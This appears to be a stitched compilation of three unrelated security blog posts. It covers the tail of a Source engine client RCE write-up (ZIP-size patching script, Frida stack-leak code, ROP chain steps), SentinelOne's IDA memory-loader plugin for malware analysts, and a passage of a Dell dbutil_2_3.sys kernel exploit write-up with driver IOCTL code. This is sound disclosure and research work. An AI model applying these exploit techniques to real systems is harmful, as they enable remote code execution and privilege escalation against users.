After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we're going. int totalBytes is a signed integer, and the comparison for whether a file is too large is a signed comparison. What happens when totalBytes is negative? A negative value is always less than the limit, so the length check fully passes.

If we are able to hack a file with a negative length into the ZIP structure, the engine will now happily upload it to the server.
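
Conceptually, the trick looks like the following sketch. This is not the BSP/pakfile script referenced further down, just an illustration against a bare ZIP blob: the field offsets follow the standard PKZIP local file header and central directory layouts, and test.txt / 0xFFFFFFF0 are example values.

import struct

def patch_entry_size(zip_bytes, name=b"test.txt", new_size=0xFFFFFFF0):
    """Rewrite uncompressedSize for `name` so it reads as a negative signed int32."""
    data = bytearray(zip_bytes)

    # Local file header: 'PK\x03\x04', uncompressedSize at +22, file name at +30
    off = data.find(b"PK\x03\x04")
    while off != -1:
        name_len = struct.unpack_from("<H", data, off + 26)[0]
        if data[off + 30:off + 30 + name_len] == name:
            struct.pack_into("<I", data, off + 22, new_size)
        off = data.find(b"PK\x03\x04", off + 4)

    # Central directory record: 'PK\x01\x02', uncompressedSize at +24, name at +46
    off = data.find(b"PK\x01\x02")
    while off != -1:
        name_len = struct.unpack_from("<H", data, off + 28)[0]
        if data[off + 46:off + 46 + name_len] == name:
            struct.pack_into("<I", data, off + 24, new_size)
        off = data.find(b"PK\x01\x02", off + 4)

    return bytes(data)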

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on the stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 bytes of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack's contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client's subchannel will continue to send fragments indefinitely as the "file size" is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.
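
As a rough illustration of that filtering (not the author's actual heuristics), a server-side script might scan each leaked fragment for DWORDs falling in the range where this 32-bit process's image mappings tend to live; the range below is illustrative and would be tuned by watching repeated leaks.

import struct

def candidate_pointers(frag):
    """Return (offset, value) pairs in a leaked 0x100-byte fragment that look like
    pointers into a loaded module (e.g. the 0x7Axxxxxx-0x7Cxxxxxx values above)."""
    hits = []
    for off in range(0, len(frag) - 3, 4):
        val = struct.unpack_from("<I", frag, off)[0]
        if 0x70000000 <= val < 0x80000000:  # illustrative range for this process
            hits.append((off, val))
    return hits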

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4), so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it the label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet, sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length.

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance, this time with the value C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker-known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value exploits the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value into instead being a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain will load the necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe as a proof of concept. This chain can execute any code of the attacker's choosing, and has full permissions to access all of the user's files and data.

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here's a video of the full PoC in action; be sure to full screen it so it's easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I've started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than Source's. There hasn't been too much public research done on Steam's networking protocols, so I've written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. First, if the researcher is actively investigating a sample and the AV throws a static detection, it can hamper the very work the researcher is employed to do. Second, it's good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine "dirty" (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL where the memory loading capabilities live. Its main functionality is to take a buffer of bytes from any source and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the files inside the zip and allow you to choose the one you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk; only the (possibly encrypted) zip file remains on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the memory loader DLLs in the IDA directory folder.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  4. Place the loaders in the loaders directory of IDA.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. UrlLoader will be offered as one of the suggested loaders.
  3. After you choose UrlLoader, you will be asked to enter a URL:
  4. The loader will browse to the network location you entered. IDA Pro will then use the loader code and load the binary as if it were a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function indicates whether the loader is relevant to the binary currently being loaded into IDA. For example, if you are loading a PE, build_loaders_list should return PE.dll as one of the loading options.

    4. load_file – this function is responsible for loading the file into the database. Each loader implements this function differently, so there is not much to say here. Documentation on loaders can be found here.
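
The plugin ships these callbacks as native DLL loaders, but for illustration, here is roughly what the same two entry points look like in an IDAPython loader script (the format name, base address, and MZ check are placeholders, not part of the SentinelOne plugin):

import idaapi

def accept_file(li, filename):
    # Decide whether this loader applies to the input; return 0 to decline
    li.seek(0)
    if li.read(2) == b"MZ":
        return "Example memory-buffer loader (illustrative)"
    return 0

def load_file(li, neflags, fmt):
    # Copy the input bytes into the database and describe them with a segment
    li.seek(0)
    data = li.read(li.size())
    base = 0x400000
    idaapi.mem2base(data, base)
    idaapi.add_segm(0, base, base + len(data), "LOADED", "CODE")
    return 1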

  1. The project can be compiled into two versions: 64-bit IDA with 64-bit addresses, and 64-bit IDA with 32-bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files (same for X64 | X64 and X32 | X64):
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
    2. X32 | X64
      1. idasdk75\lib\x64_win_vc_32
      2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that endpoint security doesn't detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro, a separate environment is often created for it, usually in a virtual machine. Copying the binary over and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin allows you to work from your own machine in a safer and more productive way.

Please note that an IDA Pro license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

Introduction

Recently I said I was going to focus on browser exploitation since Advanced Windows Exploitation was canceled. With AWE now canceled two years running, I found myself craving binary exploitation training, so I enrolled in HackSysTeam's Windows Kernel Exploitation Advanced course, which takes place at the end of this month at CanSecWest. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell's dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Satoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are writing, conducting vulnerability research, and writing code - so regardless of whether you find this blog helpful or redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important that mitigations like VBS/HVCI become more mainstream, and that at the end of the day these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif's blog post explains very well how this vulnerability arises, but the tl;dr is that there is an IOCTL code, reachable by any client through a call to DeviceIoControl, that eventually leads to a memmove routine whose arguments come from the user-supplied buffer passed to the vulnerable IOCTL.

Let's get started with the analysis. As is customary in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with it. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it and which allows clients to interact with the driver. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a "representation" of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.
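
The author's POC is written in C; as a rough equivalent (illustrative, not the original code), the same handle can be obtained from Python with ctypes, using the symbolic link recovered above:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.CreateFileW.argtypes = [
    wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, wintypes.LPVOID,
    wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE,
]
kernel32.CreateFileW.restype = wintypes.HANDLE

GENERIC_READ, GENERIC_WRITE, OPEN_EXISTING = 0x80000000, 0x40000000, 3

# Open the device exposed by dbutil_2_3.sys via its symbolic link
handle = kernel32.CreateFileW(r"\\.\DBUtil_2_3",
                              GENERIC_READ | GENERIC_WRITE,
                              0, None, OPEN_EXISTING, 0, None)
if handle in (None, wintypes.HANDLE(-1).value):
    raise ctypes.WinError(ctypes.get_last_error())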

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument and to send data to the driver. However, we know that drivers create I/O control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn't foolproof, is to look for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs, and drivers, especially enterprise-grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn't contain many functions, it is relatively trivial to locate a function which performs many of these comparisons.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction executes, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.
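
Reusing the handle from the sketch above, a small helper around DeviceIoControl (again a hedged ctypes sketch rather than the author's C code) is enough to shove raw bytes at the vulnerable IOCTL and inspect whatever comes back:

import ctypes
import struct
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.DeviceIoControl.argtypes = [
    wintypes.HANDLE, wintypes.DWORD,
    wintypes.LPVOID, wintypes.DWORD,
    wintypes.LPVOID, wintypes.DWORD,
    ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID,
]
kernel32.DeviceIoControl.restype = wintypes.BOOL

def send_ioctl(handle, code, in_bytes, out_len=0x20):
    # Fire an IOCTL at the driver and hand back whatever lands in the output buffer
    inbuf = ctypes.create_string_buffer(in_bytes, len(in_bytes))
    outbuf = ctypes.create_string_buffer(out_len)
    returned = wintypes.DWORD(0)
    if not kernel32.DeviceIoControl(handle, code, inbuf, len(in_bytes),
                                    outbuf, out_len, ctypes.byref(returned), None):
        raise ctypes.WinError(ctypes.get_last_error())
    return outbuf.raw[:returned.value]

IOCTL_ARBITRARY_WRITE = 0x9B0C1EC8
# First experiment: a single arbitrary QWORD (as described below, the driver
# rejects this because the buffer is smaller than the 0x18 bytes it expects)
# send_ioctl(handle, IOCTL_ARBITRARY_WRITE, struct.pack("<Q", 0x4141414141414141))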

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sub rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and an NTSTATUS code of 0xC000000D, which means STATUS_INVALID_PARAMETER, is returned back to the client. This is the driver's way of letting the client know one of the needed arguments wasn't correct in the IOCTL call. This means that if we want to reach the memmove routine, we will need to send at least 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_15294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr [rsp+0x30] instruction, which moves the DWORD at RSP+0x30 into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts pointers to memory. Since we passed raw junk values, these addresses are invalid. Because of this, let's switch up our POC a bit again in order to see if we can't get a desired result. Let's use KUSER_SHARED_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif's research, we will send a 0x20-byte buffer. Kasif points out that the memmove routine, before reaching the call, will index our buffer at offsets 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, our 0x42 bytes (4 of them, to be exact) will be loaded into ECX.

